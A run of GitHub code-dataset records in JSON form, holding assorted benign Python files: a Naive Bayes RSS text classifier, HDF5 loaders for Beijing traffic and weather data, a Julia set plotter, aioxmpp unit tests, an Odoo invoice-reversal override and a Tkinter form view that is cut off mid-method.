set([]) #create empty set\r\n for document in dataSet:\r\n vocabSet = vocabSet | set(document) #union of the two sets\r\n return list(vocabSet)\r\n\r\ndef calcMostFreq(vocabList,fullText,topwordNum):\r\n import operator\r\n freqDict = {}\r\n for token in vocabList:\r\n freqDict[token]=fullText.count(token)\r\n sortedFreq = sorted(freqDict.iteritems(), key=operator.itemgetter(1), reverse=True)\r\n return sortedFreq[:topwordNum]\r\n\r\ndef bagOfWords2VecMN(vocabList, inputSet):\r\n returnVec = [0]*len(vocabList)\r\n for word in inputSet:\r\n if word in vocabList:\r\n returnVec[vocabList.index(word)] += 1\r\n return returnVec\r\n\r\ndef localWords(feed1,feed0,topwordNum):\r\n docList=[]\r\n classList = []\r\n fullText =[]\r\n minLen = min(len(feed1['entries']),len(feed0['entries']))\r\n for i in range(minLen):\r\n wordList = textParse(feed1['entries'][i]['summary'])\r\n docList.append(wordList)\r\n fullText.extend(wordList)\r\n classList.append(1)\r\n\r\n wordList = textParse(feed0['entries'][i]['summary'])\r\n docList.append(wordList)\r\n fullText.extend(wordList)\r\n classList.append(0)\r\n\r\n vocabList = createVocabList(docList)\r\n topWords = calcMostFreq(vocabList,fullText,topwordNum)\r\n for pairW in topWords:\r\n if pairW[0] in vocabList:\r\n vocabList.remove(pairW[0])\r\n trainingSet = range(2*minLen)\r\n testSet=[]\r\n for i in range(int(len(trainingSet) * 0.25)):\r\n randIndex = int(np.random.uniform(0,len(trainingSet)))\r\n testSet.append(trainingSet[randIndex])\r\n del(trainingSet[randIndex])\r\n x_train=[]\r\n y_train = []\r\n x_test = []\r\n y_test = []\r\n for docIndex in trainingSet:\r\n x_train.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\r\n y_train.append(classList[docIndex])\r\n for docIndex in testSet:\r\n x_test.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\r\n y_test.append(classList[docIndex])\r\n\r\n\r\n gnb = NB.GaussianNB()\r\n # bnb = NB.BernoulliNB()\r\n # mnb = NB.MultinomialNB()\r\n y_predict = gnb.fit(x_train, y_train).predict(x_test)\r\n return (y_predict != y_test).sum()\r\n\r\nif __name__ == '__main__':\r\n\r\n # UKJinRong = feedparser.parse('http://www.ftchinese.com/rss/feed') # 100\r\n # wineworld = feedparser.parse('http://www.wine-world.com/articlerss/rss.aspx') # 75\r\n nasa = feedparser.parse('http://www.nasa.gov/rss/dyn/image_of_the_day.rss') # 60\r\n zhihuMeiRi = feedparser.parse('https://www.zhihu.com/rss') # 60\r\n # toutiao = feedparser.parse('http://news.163.com/special/00011K6L/rss_newstop.xml') # 50\r\n # weifeng = feedparser.parse('http://news.feng.com/rss.xml') # 40\r\n # caijingZhoukan = feedparser.parse('http://blog.163.com/cbn.weekly/rss/') # 40\r\n # geekpark = feedparser.parse('http://www.geekpark.net/rss') # 30\r\n # yahoo = feedparser.parse('http://sports.yahoo.com/nba/teams/hou/rss.xml') # 15\r\n # nature = feedparser.parse('http://feeds.nature.com/news/rss/most_recent') # 15\r\n # cnblog = feedparser.parse('http://feed.cnblogs.com/blog/u/161528/rss') # 10\r\n # matrix67 = feedparser.parse('http://www.matrix67.com/blog/feed') # 10\r\n # chaijinSina = feedparser.parse('http://blog.sina.com.cn/rss/1219548027.xml') # 10\r\n\r\n\r\n\r\n\r\n for _ in range(100):\r\n errors = localWords(nasa, zhihuMeiRi,0)\r\n print(errors)\r\n print(errors/float(30))","repo_name":"RavInHessianMatx/ML","sub_path":"SciKit-LearnProject/NaiveBayes/sampleFromMLinAct.py","file_name":"sampleFromMLinAct.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74031766454","text":"import h5py\nimport datetime\n\ndef decode_time_steps(time_steps):\n new_time_steps = []\n for step in time_steps:\n new_time_steps.append(step.decode('utf-8'))\n return new_time_steps\n\n\ndef load_data():\n filename = 'R:/vkr2/fastapi\\dao\\BJ13_M32x32_T30_InOut.h5'\n with h5py.File(filename, 'r') as file:\n dataset_name = 'data'\n time_steps_name = 'date'\n dataset = file[dataset_name][:]\n time_steps = file[time_steps_name][:]\n return dataset, decode_time_steps(time_steps)\n\n\ndef get_one_shot(datetime: str):\n data, time_steps = load_data()\n idx = 0\n if datetime.encode('utf-8') in time_steps:\n for step in time_steps:\n if step.decode('utf-8') == datetime:\n break\n idx += 1\n else:\n return \"No data\"\n one_data = data[idx]\n\n inflow = one_data[0]\n outflow = one_data[1]\n\n return inflow, outflow\n\n\ndef check_miss_data():\n dataset, time_steps = load_data()\n start = time_steps[0][:8]\n end = time_steps[len(time_steps)-1][:8]\n start_date = datetime.datetime.strptime(start, \"%Y%m%d\")\n end_date = datetime.datetime.strptime(end, \"%Y%m%d\")\n missing_dates = []\n partial_dates = []\n complete_dates = []\n\n for d in range((end_date - start_date).days + 1):\n date = start_date + datetime.timedelta(days=d)\n date_str = date.strftime(\"%Y%m%d\")\n date_steps = [step for step in time_steps if step.startswith(date_str)]\n if not date_steps:\n missing_dates.append(date_str)\n elif len(date_steps) < 48:\n partial_dates.append(date_str)\n else:\n complete_dates.append(date.strftime(\"%Y-%m-%d\"))\n\n return complete_dates\n\n\ndef load_weather():\n filename = 'R:/vkr2/fastapi\\dao\\BJ_Meteorology.h5'\n with h5py.File(filename, 'r') as file:\n temp = file['Temperature'][:]\n weather = file['Weather'][:]\n wind = file['WindSpeed'][:]\n time_steps = decode_time_steps(file['date'][:])\n\n all_weather = {\n 'date': time_steps,\n 'temperature': temp,\n 'wind': wind,\n 'weather': weather\n }\n return all_weather\n\n\ndef convert_weather_type(weather_array):\n weather_types = {0: 'Sunny',\n 1: 'Cloudy',\n 2: 'Overcast',\n 3: 'Rainy',\n 4: 'Sprinkle',\n 5: 'ModerateRain',\n 6: 'HeavyRain',\n 7: 'Rainstorm',\n 8: 'Thunderstorm',\n 9: 'FreezingRain',\n 10: 'Snowy',\n 11: 'LightSnow',\n 12: 'ModerateSnow',\n 13: 'HeavySnow',\n 14: 'Foggy',\n 15: 'Sandstorm',\n 16: 'Dusty'}\n w = 1\n if w in weather_array:\n return weather_types[list(weather_array).index(w)]\n\n\ndef get_weather(datetime: str):\n weather = load_weather()\n time_steps = weather['date']\n idx = 0\n if datetime in time_steps:\n for step in time_steps:\n if step == datetime:\n break\n idx += 1\n else:\n return \"No data\"\n\n this_weather = {\n 'temperature': weather['temperature'][idx],\n 'wind': weather['wind'][idx],\n 'weather': convert_weather_type(weather['weather'][idx])\n }\n\n return this_weather\n\ndef load_events():\n filename = 'R:/vkr2/fastapi\\dao\\BJ_Holiday.txt'\n events = []\n with open(filename, 'r') as file:\n for event in file:\n events.append(event.strip())\n return events\n\ndef get_events(datetime:str):\n events = load_events()\n if datetime[:8] in events:\n return True\n return False\n\n\n","repo_name":"ratmeow/VKR","sub_path":"testik.py","file_name":"testik.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15924197751","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nimport cmath\r\nimport time\r\n\r\n\r\ndef julia_set(c):\r\n # Initialise an empty array (corresponding to pixels)\r\n julia = np.zeros((x_res, y_res))\r\n\r\n # Loop over each pixel\r\n for ix in range(x_res):\r\n for iy in range(y_res):\r\n # Map pixel position to a point in the complex plane\r\n z = complex(ix / x_res * width + xmin, iy / y_res * height + ymin)\r\n # Iterate\r\n iteration = 0\r\n while abs(z) <= z_abs_max and iteration < max_iter:\r\n z = z ** 2 + c\r\n iteration += 1\r\n\r\n iteration_ratio = iteration / max_iter\r\n # Set the pixel value to be equal to the iteration_ratio\r\n julia[iy, -ix] = iteration_ratio\r\n\r\n # Plot the array using matplotlib's imshow\r\n fig, ax = plt.subplots()\r\n ax.imshow(julia, interpolation='bilinear')\r\n plt.axis()\r\n plt.show()\r\n\r\n\r\n# Program starting\r\nprint('Hi Welcome to the Julia Set Program. '\r\n 'Please set you complex number (The Origin function is : F(z) = z^2 + c)(Note that the max iterations is 1000')\r\nc = complex(input())\r\nprint(\"Programmed by Mockingbird\")\r\ntime.sleep(2)\r\n\r\n# Parameters\r\nx_res, y_res = 300, 300\r\nxmin, xmax = -1.5, 1.5\r\nwidth = xmax - xmin\r\nymin, ymax = -1.5, 1.5\r\nheight = ymax - ymin\r\n\r\nmax_iter = 1000\r\n\r\nbetta = (1 + cmath.sqrt(1 + 4 * (c.real * c.real + c.imag * c.imag))) / 2\r\nbetta = betta.real\r\nz_abs_max = betta\r\njulia_set(c)\r\n","repo_name":"Mockingbird2k/Computational-Physics","sub_path":"Simulation series 2/1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74501206771","text":"from pyramid.config import Configurator\n\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n with Configurator(settings=settings) as config:\n #Set up Caching\n if not \"cache.regions\" in settings:\n #Set default cache regions (if not set)\n settings[\"cache.regions\"] = \"default_term, second, short_term, long_term\"\n config.include('.lib.caching')\n #Setup Views\n config.include('.views')\n #Scan for decorator configs\n config.scan()\n\n return config.make_wsgi_app()\n","repo_name":"belasin/alookup","sub_path":"alookup/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74497646451","text":"\"\"\"\nКрасота спасёт мир\nОдно из древних поверий гласит, что \nтрёхзначное число красиво, если \nсумма его минимальной и максимальной цифр равна оставшейся цифре умноженной на 2.\n\nНапишите систему определяющую красоту числа.\n\nФормат ввода\nОдно трёхзначное число\n\nФормат вывода\nYES — если число красивое, иначе — NO\n\nПример 1\nВвод\n123\nВывод\nYES\nПример 2\nВвод\n748\nВывод\nNO\n\"\"\"\n\nnumber = input()\n\narray = sorted([int(number[0]), int(number[1]), int(number[2])])\n\nif array[0] + array[2] == array[1] * 2:\n print(\"YES\")\nelse:\n print(\"NO\")","repo_name":"Palex068/PythonData","sub_path":"PythonYandex/2.2/K.py","file_name":"K.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69914633014","text":"import pickle \nimport re\nimport os \nimport numpy as np\nfrom vectorizer import vect \n\nif __name__ == \"__main__\": \n cur_dir = os.path.dirname(__file__)\n clf = pickle.load(open(os.path.join(cur_dir,'pkl_objects','classifier.pkl'),'rb')) \n label ={0:'negative',1:'positive'}\n example = ['I love this movie'] \n X = vect.transform(example) \n print(\"Movie review: %s\" % example)\n print('Prediction: %s\\nProbability: %.2f%%' % (label[clf.predict(X)[0]],np.max(clf.predict_proba(X))*100)) \n \n example = ['I hate this movie'] \n X = vect.transform(example) \n print(\"Movie review: %s\" % example)\n print('Prediction: %s\\nProbability: %.2f%%' % (label[clf.predict(X)[0]],np.max(clf.predict_proba(X))*100))\n\n ","repo_name":"Krish-Mahajan/amazon-movie-reviews","sub_path":"movieclassifier/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32685044456","text":"########################################################################\n# File name: test_rfc6120.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n#\n########################################################################\nimport unittest\n\nimport aioxmpp.rfc6120 as rfc6120\nimport aioxmpp.stanza as stanza\nimport aioxmpp.structs as structs\nimport aioxmpp.nonza as nonza\nimport aioxmpp.xso as xso\n\nfrom aioxmpp.utils import namespaces\n\n\nclass TestBindFeature(unittest.TestCase):\n def test_registered_at_StreamFeatures(self):\n self.assertIn(\n rfc6120.BindFeature.TAG,\n nonza.StreamFeatures.CHILD_MAP\n )\n\n\nclass TestBind(unittest.TestCase):\n def test_declare_ns(self):\n self.assertDictEqual(\n rfc6120.Bind.DECLARE_NS,\n {\n None: namespaces.rfc6120_bind,\n }\n )\n\n def test_tag(self):\n self.assertEqual(\n rfc6120.Bind.TAG,\n (namespaces.rfc6120_bind, \"bind\")\n )\n\n def test_jid(self):\n self.assertIsInstance(\n rfc6120.Bind.jid,\n xso.ChildText\n )\n self.assertEqual(\n rfc6120.Bind.jid.tag,\n (namespaces.rfc6120_bind, \"jid\")\n )\n self.assertIsInstance(\n rfc6120.Bind.jid.type_,\n xso.JID\n )\n self.assertIs(\n rfc6120.Bind.jid.default,\n None\n )\n\n def test_resource(self):\n self.assertIsInstance(\n rfc6120.Bind.resource,\n xso.ChildText\n )\n self.assertEqual(\n rfc6120.Bind.resource.tag,\n (namespaces.rfc6120_bind, \"resource\")\n )\n self.assertIs(\n rfc6120.Bind.resource.default,\n None\n )\n\n def test_default_init(self):\n obj = rfc6120.Bind()\n self.assertIsNone(obj.jid)\n self.assertIsNone(obj.resource)\n\n def test_init(self):\n jid = structs.JID.fromstr(\"foo@bar.example\")\n obj = rfc6120.Bind(\n jid=jid,\n resource=\"foobar\"\n )\n self.assertEqual(\n jid,\n obj.jid)\n self.assertEqual(\n \"foobar\",\n obj.resource)\n\n def test_registered_at_IQ(self):\n self.assertIn(\n rfc6120.Bind.TAG,\n stanza.IQ.CHILD_MAP\n )\n","repo_name":"horazont/aioxmpp","sub_path":"tests/test_rfc6120.py","file_name":"test_rfc6120.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"73315779574","text":"import cv2\nimport os\n\n\ndef extract_frames(video_path, frames_file, output_dir):\n # Create the output directory if it doesn't exist\n os.makedirs(output_dir, exist_ok=True)\n\n # Read the video\n video = cv2.VideoCapture(video_path)\n\n # Check if the video is successfully opened\n if not video.isOpened():\n print(f\"Failed to open video: {video_path}\")\n return\n\n # Read the frames file\n with open(frames_file, 'r') as f:\n frames_list = [int(os.path.splitext(frame.strip())[0].split('_')[-1]) + 1 for frame in f.readlines()]\n\n # Extract the selected frames\n frame_counter = 0\n frame_id = 0\n\n while True:\n success, frame = video.read()\n\n if not success:\n break\n\n if frame_counter == frames_list[frame_id]:\n # Save the extracted frame as an image\n frame_output_path = os.path.join(output_dir, f\"v2frame_{frame_counter - 1:06d}.jpg\")\n cv2.imwrite(frame_output_path, frame)\n\n # Move to the next frame in the list\n frame_id += 1\n\n # Break the loop if all frames have been extracted\n if frame_id >= len(frames_list):\n break\n\n frame_counter += 1\n\n # Release the video capture\n video.release()\n\n\n# Path to the video file\nvideo_path = './v2.mp4'\n\n# Path to the text file containing the list of frames to extract\nframes_file = './sorted_file.txt'\n\n# Directory to save the extracted frames\noutput_dir = './data/images'\n\n# Extract the frames\nextract_frames(video_path, frames_file, output_dir)","repo_name":"RohaanA/-VTX-Experiencing-Tennis-Virtually-in-3D-from-2D-Stream","sub_path":"Trainer/ImageExtractor.py","file_name":"ImageExtractor.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72355776372","text":"\r\n# 1\r\ndef fact(n):\r\n if n == 0:\r\n return 1\r\n else:\r\n return n * fact(n-1)\r\n\r\n\r\n# 2\r\n# Use stack to simulate recursion.\r\n\r\nfrom stack import Stack\r\n\r\ndef print_num_use_stack(n):\r\n s = Stack()\r\n while n > 0:\r\n s.push(n)\r\n n -= 1\r\n while not s.is_empty():\r\n print(s.pop())","repo_name":"zwMargaretProject/BigW","sub_path":"dataStructures/recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12317088156","text":"import json\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\npages = [filename for filename in os.listdir('.') if filename.startswith(\"page\")]\n\nall_reports = []\nfor page in pages:\n with open(page) as f:\n json_reports = json.load(f)\n f.close()\n reports = json_reports['data']['worldData']['encounter']['characterRankings']\n reports = pd.json_normalize(data=reports, record_path=['rankings','gear'], meta=[['rankings', 'amount'],['rankings', 'name'],['rankings', 'duration']])\n # Now we are only interested in the 15th slot which is the main hand\n reports = reports.iloc[15::18,:]\n # We can drop some irrelevant columns\n wanted_columns = ['name','id','rankings.amount','rankings.name','rankings.duration']\n reports = reports[wanted_columns]\n all_reports.append(reports)\n\n# Now we need to get the weapon speed of each item. We get a json-database of items.\nreports = pd.concat(all_reports)\nwith open('./item_data.json') as f:\n json_items = json.load(f)\n f.close()\nitems = pd.json_normalize(json_items)\n# We filter out only the weapons and rename itemId to id so it can be merged with report.\n# Since the weapon speed is contained in the tooltip we need to keep that as well.\nweapons = items[items['class'] == 'Weapon']\nweapons = weapons.rename(columns={'itemId':'id'})\nweapons = weapons[['id','tooltip']]\n# We need to drop Elune's candle since it has no speed.\nweapons = weapons.drop(index=weapons[weapons.id == 21713].index)\n# Then we extract the speeds.\ndef format_label(label):\n speed = label[6:]\n if(len(speed) > 0):\n return float(speed)\n else:\n return np.nan\nextract_speed = lambda tooltips : [format_label(t['label']) for t in tooltips if 'Speed ' in t['label']][0]\nweapons.tooltip = weapons.tooltip.apply(extract_speed)\nweapons = weapons.rename(columns={'tooltip':'speed'})\n\n# Then we merge it with the reports, so now we have a dps measure and main hand weapon speed for each player in the top rankings.\n# We need to make sure that the dps is in right format as well.\nreports = reports.rename(columns={'rankings.amount':'dps', 'rankings.duration':'duration'})\nreports.dps = reports.dps.apply(float)\nreports.duration = reports.duration.apply(float)\nreports = reports.dropna()\nreports.id = reports.id.apply(int)\nreports = reports.merge(weapons)\nplt.figure()\nsns.boxplot(data=reports, x='speed', y='dps')\nplt.savefig(\"lala\")\nplt.close()\n","repo_name":"vonpost/wcl-analysis","sub_path":"wcl-api.py","file_name":"wcl-api.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5757794759","text":"from odoo import models\n\n\nclass AccountMoveReversal(models.TransientModel):\n _inherit = \"account.move.reversal\"\n\n def reverse_moves(self):\n \"\"\"Link return moves to the lines of refund invoice\"\"\"\n action = super().reverse_moves()\n if \"res_id\" in action:\n moves = self.env[\"account.move\"].browse(action[\"res_id\"])\n else:\n moves = self.env[\"account.move\"].search(action[\"domain\"])\n for line in moves.mapped(\"invoice_line_ids\"):\n reverse_moves = line.move_line_ids.mapped(\"returned_move_ids\")\n if reverse_moves:\n line.move_line_ids = reverse_moves\n return action\n","repo_name":"intisoft22/2023-Triyudha","sub_path":"stock_picking_invoice_link/wizards/account_move_reversal.py","file_name":"account_move_reversal.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1746036778","text":"# Напишите программу, которая на вход принимает 5 чисел и находит максимальное из них.\n\n# Примеры:\n# -> 1, 4, 8, 7, 5 --> 8\n# -> 78, 55, 36, 90, 2 --> 90\n\n# y = [1, 15, -136, 4, 98]\n# print(y)\n# m = y[0]\n\n# for i in y:\n# if i > m:\n# m = i\n\n# print(f\"--> {m}\")\n\n# заполняем список \na=[] # Создаем пустой список \nfor i in range(5):\n k=int(input(\" Введите число --> \"))\n a.append(k)\n\nmax=a[0]\nfor i in a:\n if i>max:\n max=i\nprint(f\" Максимальное число --> {max}\") ","repo_name":"vyky1983/Python","sub_path":"Уроки Python/Syminar/Sym1/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3733661802","text":"import os\nimport fnmatch\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\n\nclass ScoresToplineView(ttk.Frame):\n\tdef __init__(self, parent, controller):\n\t\tsuper().__init__(parent)\n\t\tself.parent = parent\n\t\tself.controller = controller\n\n\t\t# create widgets\n\t\t# path_to_csv, round, location\n\t\t# input file path\n\t\tself.input_label = ttk.Label(self, text='Path to input file:', justify=tk.RIGHT, anchor=\"e\")\n\t\tself.input_label.grid(sticky = tk.E, row=1, column=0)\n\t\t\n\t\tself.input_var = tk.StringVar()\n\t\tself.input_entry = ttk.Entry(self, textvariable=self.input_var, width=30)\n\t\tself.input_entry.grid(row=1, column=1, sticky=tk.NSEW)\n\t\t\n\t\tself.input_button = ttk.Button(self, text='Open', command=self.input_button_clicked)\n\t\tself.input_button.grid(row=1, column=2, padx=10)\n\t\t\n\t\tself.input_message = ttk.Label(self, text='', foreground='red')\n\t\tself.input_message.grid(row=1, column=3, sticky=tk.W)\n\n\t\t# round selection\n\t\tself.round_label = ttk.Label(self, text='Round number:', justify=tk.RIGHT, anchor=\"e\")\n\t\tself.round_label.grid(sticky = tk.E, row=2, column=0)\n\t\t\n\t\tself.round_menu = tk.StringVar()\n\t\tself.round_menu.set(\"Pick a round number:\")\n\t\t\n\t\trounds = list(range(1,51))\n\t\t\n\t\tself.round_dropdown = tk.OptionMenu(self, self.round_menu, *rounds, command=self.round_menu_clicked)\n\t\tself.round_dropdown.grid(row=2, column=1, sticky=tk.E)\n\t\t\n\t\tself.round_message = ttk.Label(self, text='', foreground='red')\n\t\tself.round_message.grid(row=2, column=3, sticky=tk.W)\n\t\t\n\t\t# location\n\t\tself.state_dict = { \"Alabama\": \"AL\", \"Alaska\": \"AK\", \"Arizona\": \"AZ\", \"Arkansas\": \"AR\", \"California\": \"CA\", \"Colorado\": \"CO\", \"Connecticut\": \"CT\", \"Delaware\": \"DE\", \"District of Columbia\": \"DC\", \"Florida\": \"FL\", \"Georgia\": \"GA\", \"Hawaii\": \"HI\", \"Idaho\": \"ID\", \"Illinois\": \"VI\", \"Indiana\": \"WA\", \"Iowa\": \"WV\", \"Kansas\": \"KS\", \"Kentucky\": \"KY\", \"Louisiana\": \"LA\", \"Maine\": \"ME\", \"Maryland\": \"MD\", \"Massachusetts\": \"MA\", \"Michigan\": \"MI\", \"Minnesota\": \"MN\", \"Mississippi\": \"MS\", \"Missouri\": \"MO\", \"Montana\": \"MT\", \"Nebraska\": \"NE\", \"Nevada\": \"NV\", \"New Hampshire\": \"NH\", \"New Jersey\": \"NJ\", \"New Mexico\": \"NM\", \"New York\": \"IL\", \"North Carolina\": \"IN\", \"North Dakota\": \"ND\", \"Ohio\": \"OH\", \"Oklahoma\": \"OK\", \"Oregon\": \"OR\", \"Pennsylvania\": \"PA\", \"Rhode Island\": \"RI\", \"South Carolina\": \"SC\", \"South Dakota\": \"SD\", \"Tennessee\": \"TN\", \"Texas\": \"TX\", \"Utah\": \"UT\", \"Vermont\": \"VT\", \"Virginia\": \"VA\", \"Washington\": \"NY\", \"West Virginia\": \"NC\", \"Wisconsin\": \"WI\", \"Wyoming\": \"WY\"}\n\t\t\n\t\tself.location_label = ttk.Label(self, text='Location:', justify=tk.RIGHT, anchor=\"e\")\n\t\tself.location_label.grid(sticky=tk.E, row=3, column=0)\n\t\t\n\t\tself.location_menu = tk.StringVar()\n\t\tself.location_menu.set(\"Pick a location:\")\n\t\t\n\t\tself.location_dropdown = tk.OptionMenu(self, self.location_menu, *self.state_dict.keys(), command=self.location_menu_clicked)\n\t\tself.location_dropdown.grid(row=3, column=1, sticky=tk.E)\n\n\t\tself.location_message = ttk.Label(self, text='', foreground='red')\n\t\tself.location_message.grid(row=3, column=3, sticky=tk.W)\n\t\t\n\t\t# output\n\t\tself.output_label = ttk.Label(self, text='Save as:', justify=tk.RIGHT, anchor=\"e\")\n\t\tself.output_label.grid(sticky = tk.E, row=4, column=0)\n\t\t\n\t\tself.output_var = tk.StringVar()\n\t\tself.output_entry = ttk.Entry(self, textvariable=self.output_var, width=30)\n\t\tself.output_entry.grid(row=4, column=1, sticky=tk.NSEW)\n\t\t\n\t\tself.output_button = ttk.Button(self, text='Save as', command=self.output_button_clicked)\n\t\tself.output_button.grid(row=4, column=2, padx=10)\n\t\t\n\t\tself.output_message = ttk.Label(self, text='', foreground='red')\n\t\tself.output_message.grid(row=4, column=3, sticky=tk.W)\n\n\t\t# submit\t\t\n\t\tself.submit_button = ttk.Button(self, text='Submit', command=self.submit_button_clicked)\n\t\tself.submit_button.grid(row=5, column=2, pady=15, padx=10)\n\t\t\n\t\tself.submit_message = ttk.Label(self, text='', foreground='blue')\n\t\tself.submit_message.grid(row=5, column=1, sticky=tk.W)\n\n\tdef show_loading_success(self, message):\n\t\tself.update_idletasks()\n\t\tself.submit_message['foreground'] = 'blue'\n\t\tself.submit_message['text'] = message\n\t\tself.submit_message.after(1000, self.hide_submit_message)\n\n\tdef hide_submit_message(self):\n\t\tself.submit_message['text'] = ''\n\t\tself.parent.destroy()\n\n\tdef show_loading_error(self, message):\n\t\tself.update_idletasks()\n\t\tself.submit_message['foreground'] = 'red'\n\t\tself.submit_message['text'] = message\n\n\tdef input_button_clicked(self):\n\t\t\"\"\"\n\t\tHandle input button click event\n\t\t:return:\n\t\t\"\"\"\n\t\tfilename = filedialog.askopenfilename(title='Open an input file', initialdir='~/', filetypes=[('Comma-Separated File', '*.csv')])\n\t\tif filename:\n\t\t\tself.input_entry['state'] = \"normal\"\n\t\t\tself.input_entry.delete(0,tk.END)\n\t\t\tself.input_entry.insert(0,filename)\n\t\t\tself.check_input()\n\n\tdef show_input_error(self, message):\n\t\t\"\"\"\n\t\tShow an error message\n\t\t:param message:\n\t\t:return:\n\t\t\"\"\"\n\t\tself.update_idletasks()\n\t\tself.input_message['text'] = message\n\t\tself.input_message['foreground'] = 'red'\n\n\t\n\tdef hide_input_error(self):\n\t\t\"\"\"\n\t\thide an error message\n\t\t:param message:\n\t\t:return:\n\t\t\"\"\"\n\t\tself.input_message['text'] = ''\n\t\t\n\tdef round_menu_clicked(self, event):\n\t\t# if clicked at all - user forced to pick dropdown item\n\t\t# if error message on screen, remove\n\t\tself.round_message['text'] = ''\n\t\n\tdef show_round_error(self, message):\n\t\tself.update_idletasks()\n\t\tself.round_message['text'] = message\n\t\tself.round_message['foreground'] = 'red'\n\t\t\n\tdef hide_round_error(self):\n\t\tself.round_message['text'] = ''\n\n\tdef check_round(self):\n\t\t# check if round was selected\n\t\tif self.round_menu.get() == \"Pick a round number:\":\n\t\t\tself.show_round_error(\"Please select a number.\")\n\t\telse:\n\t\t\tself.hide_round_error()\n\t\t\treturn True\n\t\t\n\t\treturn False\n\n\tdef location_menu_clicked(self, event):\n\t\t# if clicked at all - user forced to pick dropdown item\n\t\t# if error message on screen, remove\n\t\tself.location_message['text'] = ''\n\t\n\tdef show_location_error(self, message):\n\t\tself.update_idletasks()\n\t\tself.location_message['text'] = message\n\t\tself.location_message['foreground'] = 'red'\n\t\t\n\tdef hide_location_error(self):\n\t\tself.location_message['text'] = ''\n\n\tdef check_location(self):\n\t\t# check if location was selected\n\t\tif self.location_menu.get() == \"Pick a location:\":\n\t\t\tself.show_location_error(\"Please select a location.\")\n\t\telse:\n\t\t\tself.hide_location_error()\n\t\t\treturn True\n\t\t\n\t\treturn False\n\n\tdef output_button_clicked(self):\n\t\t\"\"\"\n\t\tHandle output button click event\n\t\t:return:\n\t\t\"\"\"\n\t\tfilename = filedialog.asksaveasfilename(title='Save report', initialdir='~/', filetypes=[('Microsoft Excel', '*.xlsx')])\n\t\tif filename:\n\t\t\tself.output_entry['state'] = \"normal\"\n\t\t\tself.output_entry.delete(0,tk.END)\n\t\t\tself.output_entry.insert(0,filename)\n\t\t\tself.check_output()\n\n\tdef show_output_error(self, message):\n\t\t\"\"\"\n\t\tShow an error message\n\t\t:param message:\n\t\t:return:\n\t\t\"\"\"\n\t\tself.update_idletasks()\n\t\tself.output_message['text'] = message\n\t\tself.output_message['foreground'] = 'red'\n\n\t\n\tdef hide_output_error(self):\n\t\t\"\"\"\n\t\thide an error message\n\t\t:param message:\n\t\t:return:\n\t\t\"\"\"\n\t\tself.output_message['text'] = ''\n\n\tdef check_input(self):\n\t\t# check if input file path exists\n\t\tif not os.path.exists(self.input_entry.get()):\n\t\t\tself.show_input_error(\"This path does not exist.\")\n\t\telse:\n\t\t\tself.hide_input_error()\n\t\t\t\n\t\t\t# check the extension\n\t\t\tif not fnmatch.fnmatch(os.path.join(self.input_entry.get()), \"*.csv\"):\n\t\t\t\tself.show_input_error(\"Comma-separated files (.csv) only.\")\n\t\t\telse:\n\t\t\t\tself.hide_input_error()\n\t\t\t\treturn True\n\t\t\n\t\treturn False\n\n\tdef check_output(self):\n\t\t# check if directory exists\n\t\tif not os.path.isdir(os.path.dirname(os.path.join(self.output_var.get()))):\n\t\t\tself.show_output_error(\"This path does not exist.\")\n\t\telse:\n\t\t\tself.hide_output_error()\n\t\t\t\n\t\t\t# check the extension\n\t\t\tif not fnmatch.fnmatch(os.path.join(self.output_var.get()), \"*.xlsx\"):\n\t\t\t\tself.show_output_error(\"Microsoft Excel (.xlsx) only.\")\n\t\t\telse:\n\t\t\t\tself.hide_output_error\n\t\t\t\treturn True\n\t\t\n\t\treturn False\n\n\tdef submit_button_clicked(self):\n\t\t\"\"\"\n\t\tHandle submit button click 